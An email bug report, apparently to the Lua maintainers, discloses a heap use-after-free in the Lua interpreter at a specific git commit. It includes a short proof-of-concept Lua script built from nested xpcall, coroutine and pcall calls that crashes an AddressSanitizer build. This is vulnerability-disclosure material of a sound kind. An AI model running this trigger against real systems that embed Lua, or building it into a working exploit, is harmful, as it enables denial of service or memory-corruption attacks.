Hi,

We found a heap use after free bug in lua.

POC:

    function errfunc()
      (function()
        print(xpcall( wrap, coroutine.wrap(function(a, b)
          function errfunc() a = {} end
          function test(do_yield)
            pcall(function()
              if do_yield then coroutine.yield() end
            end) 'fail'
          end
          coro = function()
            print(xpcall(test, errfunc))
            xpcall(test, errfunc, true)
          end
          coro()
        end)))
      end) "" 'fail'
    end
    (function() print(xpcall(test, errfunc)) end)()

When built with address sanitizer, run `lua poc.lua` and we get a crash.

Tested on Ubuntu, lua git hash e1d8770f12542d34a3e32b825c95b93f8a341ee1

Best,

Sent from Mail for Windows 10